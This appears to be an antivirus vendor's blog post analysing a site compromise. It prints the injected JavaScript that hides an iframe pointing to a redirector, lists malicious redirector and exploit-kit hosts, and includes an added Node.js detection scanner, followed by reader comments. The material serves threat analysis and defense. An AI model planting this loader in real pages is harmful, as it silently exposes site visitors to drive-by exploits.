
March 15th, 2012

Surprising hack found on multiple sites

From the “It-could-happen-to-you” file: we innocently clicked on a link that was promoted today on a trustworthy company’s Facebook page. To our surprise, avast! blocked it as a malicious URL.

When we attempted to open the URL, it was redirected to dumb.cn.mn, which triggered the blocking action. The only content on dumb.cn.mn is one word – GOTCHA!

Senior virus analyst Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site, smcitizens.com, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitors’ cookies, which is the reason why you don’t see the warning more than once.”

He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers are running a database of visiting IP addresses on the dumb site, and if they find this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”

After looking into the hack further, Sirmer discovered that the link to dumb.cn.mn, or one of its variations, had been injected into other legitimate sites too. Those links then led to malicious sites hosting a black hole exploit kit.

Here is a list of some other dumb sites used as links in hacked legitimate websites:

  • dumb.au.mn/in.cgi?2
  • dumb.cn.mn/in.cgi?2
  • dumb.eu.mn/in.cgi?2
  • dumb.fr.mn/in.cgi?2
  • dumb.uk.mn/in.cgi?2
  • dumb.us.mn/in.cgi?2
  • dumb.jp.mn/in.cgi?2
  • dumb.nl.mn/in.cgi?2

Sirmer discovered that fckarpaty.in is one of the malicious sites to which users were redirected from the dumb sites. fckarpaty.in hosts a well-known exploit pack called Crimepack, which uses a Java vulnerability to silently download malicious Java, PDF and Flash files onto users’ computers.

In the last four days, Sirmer found that the bad guys had injected a link to one of the dumb sites into 138 unique legitimate sites visited by avast! users. This is not such a huge number, but the attackers focused on sites like smcitizens.com, which has lots of visitors.

An example of injected code:

    // Injected loader: if <body> already exists, build the hidden iframe via the DOM;
    // otherwise write it straight into the document while it is still being parsed.
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://dumb.cn.mn/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    // Creates a 10x10, invisible, absolutely positioned iframe pointing at the redirector.
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://dumb.cn.mn/in.cgi?2');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
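Because the injected script is cookie-gated and only redirects a visitor once, a site owner is better off scanning saved page source than reloading the live site. The following is an added example, not code from the avast! post: a small Node.js scanner that flags both injection shapes shown above (the document.write form and the DOM-built form) and pulls out the in.cgi redirector URLs; the sample pages are constructed, using the dumb.cn.mn address from the post.

```javascript
// Added example (not code from the avast! post). Static scanner for saved page source.
const IFRAME_INJECTION_SIGNATURES = [
  { label: 'document.write() of hidden iframe pointing at in.cgi',
    re: /document\.write\(\s*["']<iframe[^>]*in\.cgi\?\d+[^>]*visibility\s*:\s*hidden/i },
  { label: 'DOM-built iframe whose src is an in.cgi redirector',
    re: /createElement\(\s*["']iframe["']\s*\)[\s\S]{0,300}?setAttribute\(\s*["']src["']\s*,\s*["'][^"']*in\.cgi\?\d+/i },
  { label: 'tiny (<=10px) hidden iframe, any destination',
    re: /<iframe[^>]*(?:width|height)=["']?(?:10|[0-9])(?![0-9])[^>]*visibility\s*:\s*hidden/i },
];
// Redirector URLs of the form http://<host>/in.cgi?<n>, as seen in the hacked pages.
const REDIRECTOR_URL = /https?:\/\/[^\s"'<>()]+\/in\.cgi\?\d+/gi;

// Returns one hit per matching signature, with the offset of its first match.
function findInjectedIframes(html) {
  const hits = [];
  for (const { label, re } of IFRAME_INJECTION_SIGNATURES) {
    const m = re.exec(html);
    if (m) hits.push({ label, offset: m.index });
  }
  return hits;
}

// Unique redirector URLs (lower-cased), e.g. for blocking or for access-log review.
function extractRedirectorUrls(html) {
  const found = (html.match(REDIRECTOR_URL) || []).map((u) => u.toLowerCase());
  return [...new Set(found)];
}

// Constructed samples: a clean page with an ordinary embed, and the same page with
// the injected snippet from the post appended before </body>.
const SAMPLE_CLEAN = `<html><body><p>Welcome</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>`;
const SAMPLE_INFECTED = SAMPLE_CLEAN.replace('</body>', `<script>
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
  document.write("<iframe src='http://dumb.cn.mn/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); }
function iframer() { var f = document.createElement('iframe');
  f.setAttribute('src', 'http://dumb.cn.mn/in.cgi?2'); f.style.visibility = 'hidden';
  f.setAttribute('width', '10'); f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f); }
</script></body>`);

console.log(findInjectedIframes(SAMPLE_INFECTED), extractRedirectorUrls(SAMPLE_INFECTED));
```

The third signature is deliberately destination-agnostic, so it will also catch the same trick pointed at a different host, which is what the commenter below reports seeing.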

An image of our first visit to smcitizens.com.


And the second visit. Images provided by avast! Virus Lab.


This image has been marked to show the redirection to dumb.cn.mn.

  1. Tech
    March 15th, 2012 at 03:12 | #1

    Sirmer is always doing good, hard work…
    I’m jealous, because it’s difficult to get some info from him for the blog :)

  2. sourov00
    March 15th, 2012 at 11:16 | #2

    Avast is the best Virus Scanner in the whole world……

    I love AVAST!!! :D

  3. March 15th, 2012 at 13:23 | #3

    @Tech
    Thanks for the compliment, Tech.
    I’ll try to improve my information-sharing skills for next time :)

  4. iGiedrius
    March 15th, 2012 at 18:23 | #4

    Hi, thanks for identifying the issue, any ideas how to solve this? I ran a scan on a number of other web security sites and none of them identify the site as suspicious. I deleted the post in question, so I’m not sure if the hack was only on that post or on my server in general, as I can’t find any problems with any of the online tools.

    thanks,
    Giedrius
    Social Media Citizens

  5. iGiedrius
    March 15th, 2012 at 19:01 | #5

    Actually, I just downloaded your software and checked the copy of smcitizens.com on my PC and it didn’t identify any threats either. Something really weird is happening.

  6. March 15th, 2012 at 22:33 | #6

    @iGiedrius
    I’m trying to figure out how the bad guys injected those websites.
    Can you give me an answer to one question, please? Do you use a webkit?
    Thanks for your answer

  7. March 16th, 2012 at 01:00 | #7

    I have seen this in.cgi?2 page before. It appeared quite a bit in the avast forum under the guise of js:Redirector-NT [Trj].

    The domain that it redirected to was not a constant, but the cgi page was.

    It appears that the script has changed somewhat, but I guess it still has the same effect.

  8. iGiedrius
    March 16th, 2012 at 02:15 | #8

    No, I don’t use a webkit.
